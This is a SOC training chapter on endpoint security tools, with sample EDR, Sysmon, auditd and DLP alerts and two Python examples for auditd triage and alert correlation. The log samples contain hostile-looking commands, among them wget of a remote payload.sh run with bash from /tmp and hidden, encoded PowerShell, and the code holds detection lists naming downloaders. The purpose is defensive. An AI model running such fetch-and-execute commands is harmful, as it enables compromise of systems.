Endpoint Security Components

Endpoint security is one of the most important layers in a SOC because attackers often start their intrusion on endpoints. A SOC needs deep visibility into process execution, file activity, network behavior, memory usage, script execution, registry changes, and user actions. This chapter explains each endpoint security component with practical, real-world examples and logs, and shows how analysts use them.


Endpoint Detection and Response (EDR)

EDR is the primary tool for endpoint visibility. It runs as an agent on machines and monitors every significant activity.

What EDR Collects

  • Process creation

  • Command-line arguments

  • Parent/child process chains

  • PowerShell, cmd, bash commands

  • Network connections

  • File creation/modification

  • Registry changes

  • DLL loads

  • Memory injection behavior

Real EDR Example

Suspicious PowerShell spawned from Outlook:

Parent: OUTLOOK.EXE
Process: powershell.exe
Command: powershell -enc UwB5AHMAdABlAG0...
Network: 103.33.11.21:443

This indicates a phishing attachment dropping malware.

Analyst Usage

EDR lets analysts:

  • Kill processes

  • Isolate the endpoint

  • Retrieve forensic artifacts

  • Capture memory dumps

  • Block malicious hashes

EDR is the first line of detection and response for endpoint attacks.


Anti-Malware / Antivirus Engine

EDR usually includes anti-malware, but standalone AV still plays a role. It scans:

  • Files written to disk

  • Downloads

  • Executable content

  • Macros

  • Archives

Modern attackers often use fileless malware, so AV is no longer enough by itself.

Practical Example

Malicious file detected:

Detected: Trojan.GenericKD.403244
File Path: C:\Users\Mayur\AppData\Local\Temp\invoice.exe
Action: Quarantined

AV stops basic commodity threats before they execute.


Host-based Firewall

Each endpoint has a local firewall controlling inbound/outbound traffic.

Why It Matters

Attackers rely on outbound connections for:

  • Command-and-control

  • Data exfiltration

  • Downloading second-stage payloads

A host firewall can block unusual outbound traffic, such as PowerShell reaching suspicious IPs.

Practical Example

Blocked outbound connection:
Process: powershell.exe
Destination: 152.89.44.10:443
Reason: Not allowed by outbound rule

This prevents malware from contacting its server.


Application Whitelisting / Allowlisting

Application allowlisting only allows approved applications to run. Everything else is blocked.

Tools:

  • AppLocker (Windows)

  • WDAC (Windows Defender Application Control)

  • Carbon Black App Control

Practical Example

Unknown EXE blocked:

Blocked: C:\Users\Admin\Downloads\payload.exe
Reason: Not in allowed applications list

This stops malware even if the user tries to run it.


Script Control and Macro Protection

Attackers use scripts to bypass AV and run payloads in memory.

Critical script types:

  • PowerShell

  • WMI

  • VBScript

  • JavaScript

  • Office Macros

Protection includes:

  • PowerShell Constrained Language Mode

  • Macro blocking policies

  • AMSI integration

Example Detection

PowerShell running Base64-encoded command:

powershell.exe -enc JABjACA9ACcAaAB0AHQAcAA6AC8ALwBtAG8Aa...

This indicates script-based malware.


Endpoint Logging (Sysmon, Auditd, Windows Events)

Strong endpoint detections rely on detailed logging.

Sysmon (Windows)

Provides detailed telemetry beyond default Windows logs.

Important Sysmon events:

  • Event ID 1: Process creation

  • Event ID 3: Network connections

  • Event ID 7: Image loaded

  • Event ID 11: File create

  • Event ID 13: Registry change

  • Event ID 19–22: WMI events

Real Sysmon Example

ProcessCreate:
  Parent: winword.exe
  Process: powershell.exe
  CommandLine: powershell -nop -w hidden -c IEX(...)

This is a classic macro → PowerShell attack chain.

Auditd (Linux)

The Linux equivalent, auditd, collects:

  • Commands executed

  • File access

  • Privilege changes

  • User switching

Example:

type=USER_CMD msg=audit(1700733305): user=root cmd="wget http://malicious-ip/payload.sh"
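Auditd writes one or more records per event, each a line of key=value fields that share an audit serial, and it hex-encodes text fields (such as the sudo cmd above) when they contain spaces. The following Python is an added example for this chapter, not code from the page or from the audit project: it parses such records, regroups them by serial, decodes the hex-encoded fields and flags the download-then-execute pattern the USER_CMD line illustrates. The log lines, host user and 203.0.113.10 address are constructed; the sudo cmd value is hex-encoded by a helper so the sample matches real auditd output.

```python
"""Parse auditd records and flag download-then-execute activity.
Sample log lines below are constructed for this example."""
import os
import re

HEADER = re.compile(r"^type=(\w+) msg=audit\((\d+)\.\d+:(\d+)\):\s*(.*)$")
TOKEN = re.compile(r"(\w+)=('[^']*'|\"[^\"]*\"|\S+)")
# Text fields auditd hex-encodes when they contain spaces, quotes or control characters
HEX_FIELDS = {"cmd", "cwd", "comm", "exe", "proctitle", "name", "key", "terminal"}
DOWNLOADERS = {"wget", "curl"}
INTERPRETERS = {"bash", "sh", "dash", "zsh", "python", "python3", "perl"}
WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")


def decode_value(key, raw):
    """Strip quotes, or hex-decode the text fields auditd encodes (e.g. a sudo cmd with spaces)."""
    if len(raw) >= 2 and raw[0] == raw[-1] and raw[0] in "\"'":
        return raw[1:-1]
    if (key in HEX_FIELDS or re.fullmatch(r"a\d+", key)) and re.fullmatch(r"(?:[0-9A-Fa-f]{2})+", raw):
        return bytes.fromhex(raw).decode("utf-8", errors="replace")
    return raw


def parse_record(line):
    """One audit line -> dict of fields. USER_CMD nests its own fields inside msg='...'."""
    m = HEADER.match(line.strip())
    if not m:
        return None
    rtype, secs, serial, rest = m.groups()
    fields = {"type": rtype, "time": int(secs), "serial": int(serial)}
    for key, raw in TOKEN.findall(rest):
        if key == "msg" and raw.startswith("'"):
            for k2, r2 in TOKEN.findall(raw[1:-1]):
                fields[k2] = decode_value(k2, r2)
        else:
            fields[key] = decode_value(key, raw)
    return fields


def group_events(lines):
    """Records sharing an audit serial belong to one event (SYSCALL + EXECVE + ...)."""
    events = {}
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        ev = events.setdefault(rec["serial"], {"serial": rec["serial"], "time": rec["time"], "types": set()})
        ev["types"].add(rec["type"])
        if rec["type"] == "EXECVE":
            ev["argv"] = [rec[f"a{i}"] for i in range(int(rec["argc"])) if f"a{i}" in rec]
        else:
            for k, v in rec.items():
                ev.setdefault(k, v)
    return [events[s] for s in sorted(events)]


def assess(ev):
    """Return the reasons an event is suspicious (empty list = nothing to report)."""
    argv = ev.get("argv") or (ev["cmd"].split() if "cmd" in ev else [])
    if not argv:
        return []
    prog, args = os.path.basename(argv[0]), argv[1:]
    reasons = []
    if prog in DOWNLOADERS and any(a.startswith(("http://", "https://")) for a in args):
        reasons.append(f"{prog} fetching remote content" + (" as root" if ev.get("uid") == "0" else ""))
    if prog in INTERPRETERS and any(a.startswith(WORLD_WRITABLE) for a in args):
        reasons.append(f"{prog} running a script from a world-writable directory")
    if "USER_CMD" in ev["types"] and reasons:
        reasons.append("issued through sudo by auid " + ev.get("auid", "?"))
    return reasons


def triage(lines):
    """Return [(serial, reasons)] for the events worth an analyst's attention."""
    hits = []
    for ev in group_events(lines):
        reasons = assess(ev)
        if reasons:
            hits.append((ev["serial"], reasons))
    return hits


def _hex(s):  # how auditd writes a text field containing spaces (used only to build the sample)
    return s.encode().hex().upper()


SAMPLE_LOG = [  # constructed lines; 59 is execve on x86_64
    "type=USER_CMD msg=audit(1700733305.412:8831): pid=4112 uid=1000 auid=1000 ses=3 "
    f"msg='cwd=\"/home/mayur\" cmd={_hex('wget http://203.0.113.10/payload.sh -O /tmp/payload.sh')} "
    "exe=\"/usr/bin/sudo\" terminal=pts/0 res=success'",
    "type=SYSCALL msg=audit(1700733305.450:8832): arch=c000003e syscall=59 success=yes exit=0 ppid=4112 pid=4120 "
    "auid=1000 uid=0 gid=0 euid=0 comm=\"wget\" exe=\"/usr/bin/wget\" key=\"exec\"",
    "type=EXECVE msg=audit(1700733305.450:8832): argc=4 a0=\"wget\" a1=\"http://203.0.113.10/payload.sh\" a2=\"-O\" a3=\"/tmp/payload.sh\"",
    "type=SYSCALL msg=audit(1700733307.002:8835): arch=c000003e syscall=59 success=yes exit=0 ppid=4112 pid=4131 "
    "auid=1000 uid=0 gid=0 euid=0 comm=\"bash\" exe=\"/usr/bin/bash\" key=\"exec\"",
    "type=EXECVE msg=audit(1700733307.002:8835): argc=2 a0=\"bash\" a1=\"/tmp/payload.sh\"",
    "type=SYSCALL msg=audit(1700733320.118:8840): arch=c000003e syscall=59 success=yes exit=0 ppid=3990 pid=4140 "
    "auid=1000 uid=1000 gid=1000 euid=1000 comm=\"ls\" exe=\"/usr/bin/ls\" key=\"exec\"",
    "type=EXECVE msg=audit(1700733320.118:8840): argc=2 a0=\"ls\" a1=\"-la\"",
]

if __name__ == "__main__":
    for serial, reasons in triage(SAMPLE_LOG):
        print(serial, "; ".join(reasons))
```

Grouping by serial matters because the user id lives in the SYSCALL record while the arguments live in the EXECVE record; a rule that reads either line alone cannot say "root fetched a remote script". The execve records assume a rule such as `-a always,exit -F arch=b64 -S execve -k exec` is loaded, which is what produces the key="exec" field.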


Browser Protection

Browsers are major attack vectors.

Browser security tools monitor:

  • Malicious downloads

  • Phishing sites

  • Dangerous extensions

  • Drive-by exploit attempts

Practical example:

Blocked: Drive-by download attempt
URL: hxxp://badsite[.]xyz/dropper.js

This stops infection before payload delivery.


Email Security Integration (Client-side)

Endpoints must enforce email protections even if server filtering exists.

Endpoint email controls detect:

  • Malicious attachments

  • Macro-enabled documents

  • Scripted PDFs

  • Embedded payloads

  • Suspicious links

Practical example:

Attachment blocked: invoice.docm
Reason: Macro-enabled document from untrusted sender


Memory Protection (Exploit Mitigation)

Modern attackers often exploit memory to bypass disk-based controls.

Mechanisms include:

  • DEP (Data Execution Prevention)

  • ASLR (Address Space Layout Randomization)

  • ROP protection

  • Code injection detection

  • Behavior blocking

Practical detection:

Exploit blocked: ROP chain attempt detected in chrome.exe

Because these controls react to how the exploit behaves rather than to a known signature, they can stop exploit attempts even when the vulnerability itself is unknown (zero-day-like activity).


Device Control

Attackers use USB drives to introduce malware or steal data.

Device control allows the SOC to:

  • Block USB storage

  • Allow only approved devices

  • Monitor file transfers

  • Detect malicious drivers

Example alert:

USB Blocked:
Device: Kingston 64GB
Reason: Not in approved device list


Data Loss Prevention (DLP)

Endpoints often leak data unintentionally or maliciously.

DLP monitors:

  • Clipboard content

  • File uploads

  • Email attachments

  • USB copies

  • Cloud storage uploads

Example:

Blocked: Upload of customer_data.csv to dropbox.com

DLP stops insider threats and accidental leaks.


Endpoint Configuration Management

Attackers exploit misconfigurations. Secure configurations include:

  • Disabling unnecessary services

  • Enforcing strong password policies

  • Enabling full disk encryption

  • Enforcing least privilege

  • Ensuring patches are applied

Example: Patch alert

Host missing critical patch:
MS17-010 (EternalBlue)
Severity: Critical

SOC analysts use such alerts to drive patching before ransomware can exploit the gap.


Practical Endpoint Attack Example (Putting Everything Together)

  1. User opens malicious doc → email security logs

  2. Macro launches PowerShell → Sysmon Event 1

  3. PowerShell contacts internet → firewall + Sysmon Event 3

  4. Fileless payload loads into memory → EDR behavioral alert

  5. Attacker moves laterally → Windows Event 4624 + Sysmon logs

  6. DLP detects data copy attempt → DLP alert

  7. EDR isolates endpoint → containment

Each component catches a different phase of the attack.
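Seeing each phase as a separate alert is only useful if the SOC can tie them back together. The following Python is an added example for this chapter, not code from the page or from any SIEM: it takes alerts of the kinds listed in the seven steps above, links them into one incident per set of hosts within a time window (a 4624 network logon joins the incident of the host it came from, which is how lateral movement pulls the second machine in), ranks the incident by how many phases were observed, and names the hosts that step 7 would isolate. The alerts, host names and the 203.0.113.10 address are constructed; the mapping from detection source to phase follows the chapter's own list.

```python
"""Correlate alerts from the endpoint components in this chapter into incidents
and rank them by how many attack phases were observed on the same hosts.
All alerts below are constructed for this example."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import List, Optional, Set

# Detection source -> the attack phase the chapter assigns to it
PHASES = {
    "email": "delivery",
    "sysmon:1": "execution",
    "sysmon:3": "command-and-control",
    "firewall": "command-and-control",
    "edr": "in-memory payload",
    "windows:4624": "lateral movement",
    "dlp": "exfiltration attempt",
}
PHASE_ORDER = ["delivery", "execution", "command-and-control",
               "in-memory payload", "lateral movement", "exfiltration attempt"]


@dataclass
class Alert:
    time: datetime
    host: str
    source: str
    detail: str
    peer_host: Optional[str] = None  # for logon events: the host the logon originated from


@dataclass
class Incident:
    hosts: Set[str] = field(default_factory=set)
    alerts: List[Alert] = field(default_factory=list)

    def phases(self) -> List[str]:
        seen = {PHASES.get(a.source, "unknown") for a in self.alerts}
        return [p for p in PHASE_ORDER if p in seen]

    def severity(self) -> str:
        # One phase alone (e.g. a single network logon) is routine noise;
        # several phases on the same hosts inside the window is an intrusion.
        n = len(self.phases())
        return "critical" if n >= 4 else "high" if n >= 2 else "low"

    def last_seen(self) -> datetime:
        return max(a.time for a in self.alerts)


def correlate(alerts: List[Alert], window: timedelta = timedelta(minutes=30)) -> List[Incident]:
    """Attach each alert to an open incident that touches its host (or, for logons,
    the host it came from) within the window; otherwise open a new incident."""
    incidents: List[Incident] = []
    for a in sorted(alerts, key=lambda x: x.time):
        linked = {a.host} | ({a.peer_host} if a.peer_host else set())
        match = next((i for i in incidents
                      if i.hosts & linked and a.time - i.last_seen() <= window), None)
        if match is None:
            match = Incident()
            incidents.append(match)
        match.hosts.add(a.host)  # lateral movement pulls the newly reached host into the incident
        match.alerts.append(a)
    return incidents


def hosts_to_isolate(incidents: List[Incident]) -> List[str]:
    """Step 7 of the chain: hosts in critical incidents are candidates for EDR isolation."""
    return sorted({h for i in incidents if i.severity() == "critical" for h in i.hosts})


def _t(hhmmss: str) -> datetime:
    return datetime.strptime("2023-11-23 " + hhmmss, "%Y-%m-%d %H:%M:%S")


SAMPLE_ALERTS = [  # constructed; follows the seven steps above on WS01, then WS02
    Alert(_t("09:00:05"), "WS01", "email", "invoice.docm delivered: macro-enabled, untrusted sender"),
    Alert(_t("09:00:41"), "WS01", "sysmon:1", "winword.exe spawned powershell.exe -nop -w hidden"),
    Alert(_t("09:00:43"), "WS01", "sysmon:3", "powershell.exe -> 203.0.113.10:443"),
    Alert(_t("09:01:10"), "WS01", "edr", "behavioral: in-memory payload loaded by powershell.exe"),
    Alert(_t("09:05:00"), "SRV01", "windows:4624", "logon type 3 from ADMIN-PC", peer_host="ADMIN-PC"),
    Alert(_t("09:14:22"), "WS02", "windows:4624", "logon type 3 from WS01", peer_host="WS01"),
    Alert(_t("09:16:05"), "WS02", "dlp", "copy of customer_data.csv to removable media blocked"),
]

if __name__ == "__main__":
    incidents = correlate(SAMPLE_ALERTS)
    for inc in incidents:
        print(f"{inc.severity():8} hosts={sorted(inc.hosts)} phases={inc.phases()}")
        for a in inc.alerts:
            print(f"    {a.time:%H:%M:%S} {a.host:6} {a.source:13} {a.detail}")
    print("isolate:", hosts_to_isolate(incidents))
```

The unrelated SRV01 logon stays a separate low-severity incident because nothing else touched that host in the window, while the WS02 logon is absorbed into the WS01 incident through its peer host. The window length is the main tuning knob: too short splits slow intrusions, too long merges unrelated activity on shared servers.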


Intel Dump

  • EDR provides deep visibility into processes, file actions, network connections, and memory activity.

  • AV blocks commodity malware before execution.

  • Host firewalls prevent malicious outbound connections.

  • Application allowlisting blocks unauthorized executables.

  • Script control protects against macro and PowerShell attacks.

  • Sysmon and Auditd provide detailed endpoint logs.

  • Browser protection blocks phishing and drive-by downloads.

  • Email security blocks malicious attachments and links.

  • Memory protection stops exploit attempts.

  • Device control restricts unauthorized USB usage.

  • DLP prevents sensitive data exfiltration.

  • Strong endpoint configuration reduces attack surface.

  • Combined endpoint components detect real-world attacker behavior at every stage.
